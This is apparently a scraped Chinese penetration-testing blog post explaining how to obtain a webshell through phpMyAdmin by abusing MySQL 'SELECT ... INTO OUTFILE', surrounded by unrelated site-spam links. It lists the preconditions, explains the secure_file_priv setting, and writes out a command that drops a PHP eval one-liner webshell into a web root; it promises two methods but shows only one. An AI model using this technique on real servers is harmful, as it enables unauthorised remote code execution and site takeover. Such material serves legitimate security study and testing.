当前位置: 首页 > news >正文

相亲网站建设方案网站建设制作视频

相亲网站建设方案,网站建设制作视频,广州市几个区,家装设计师培训学校0x00 前言 来到phpmyadmin页面后如何getshell呢?下面介绍两种方法 0x01 select into outfile直接写入 1、利用条件 对web目录需要有写权限能够使用单引号(root) 知道网站绝对路径(phpinfo/php探针/通过报错等) secure_file_priv没有具体值 2、查看secure_file…

0x00 前言

来到phpmyadmin页面后如何getshell呢?下面介绍两种方法

0x01 select into outfile直接写入

1、利用条件

  • 对web目录需要有写权限能够使用单引号(root)

  • 知道网站绝对路径(phpinfo/php探针/通过报错等)

  • secure_file_priv没有具体值

2、查看secure_file_priv值

show global variables like '%secure%';

关于secure_file_priv配置介绍:

secure_file_priv 是用来限制 load dumpfile、into outfile、load_file() 函数在哪个目录下拥有上传或者读取文件的权限

当 secure_file_priv 的值为 NULL ,表示限制 mysqld 不允许导入|导出,此时无法提权
当 secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出只能发生在 /tmp/ 目录下,此时也无法提权
当 secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入|导出做限制,此时可提权

我这里的secure_file_priv值为NULL,所以不能够导入或导出

secure_file_priv这个值是只读变量,只能通过配置文件修改。如果管理员没有配置,那么我们是无法进行写入shell的,这里我为了测试能否写入修改一下

在MySQL的配置文件my.ini中进行配置:

修改后secure_file_priv的值如图所示:

3、写入一句话

select '<?php @eval($POST[1]); ?>' INTO OUTFILE 'D:\\phpStudy\\PHPTutorial\\WWW\\a.php'

这里需要注意的一个点是路径需要用"\\"

查看下根目录

http://www.yayakq.cn/news/48371/

相关文章:

  • 网站换空间会影响排名吗西安 餐饮 网站建设
  • 广西城乡建设网站wordpress网站安装插件
  • 湖南网站备案注销怎么查一个网站的外链和反链软件
  • 网站推广费用预算佛山 详情公布
  • 济宁建设企业网站win2012r2 建设网站
  • 网站的备案软文发布公司
  • 怎么做招聘网站的调研济南网站建设制作公司推荐
  • 网站建设合同的性质防水网站的外链如何找
  • 无忧网站建设启博微分销
  • 百色网站优化开源的网站后台程序
  • 网站建设 可以吗南阳建设网站
  • 静态网站的建设模板海南门户网站开发公司
  • 湖南seo网站开发wordpress微信小程式
  • 德州做网站dzqifan英语培训网站建设
  • 门户网站制作费用网站建设gzdlzgg
  • 摄影瀑布流网站模板做优品购类似网站
  • 购物网站配色怎么设计建设网站专业公司
  • 舆情信息网站网站建设图书推荐
  • seo网络营销推广公司深圳怎样做网站关键词优化
  • asp.net小型网站开发宝安福永小学网站建设
  • 数据共享网站建设怎么搭建一个网站
  • 平台网站怎么做南宁网站建设加王道下拉
  • 网站建设有前途吗wordpress在php什么版本号
  • 广州站在哪个区做的网站底部应该标注什么意思
  • php网站开发程序编译软件建立网站信息发布登记制度
  • 做信息发布类网站c# asp.net网站开发书
  • 新网官方网站权重7以上的网站
  • 苏州工业园区劳动局网站做不了合同网站建设及优化 赣icp
  • 网站首页快照百合怎么做网站
  • 鞋子网站模板网站设计英文翻译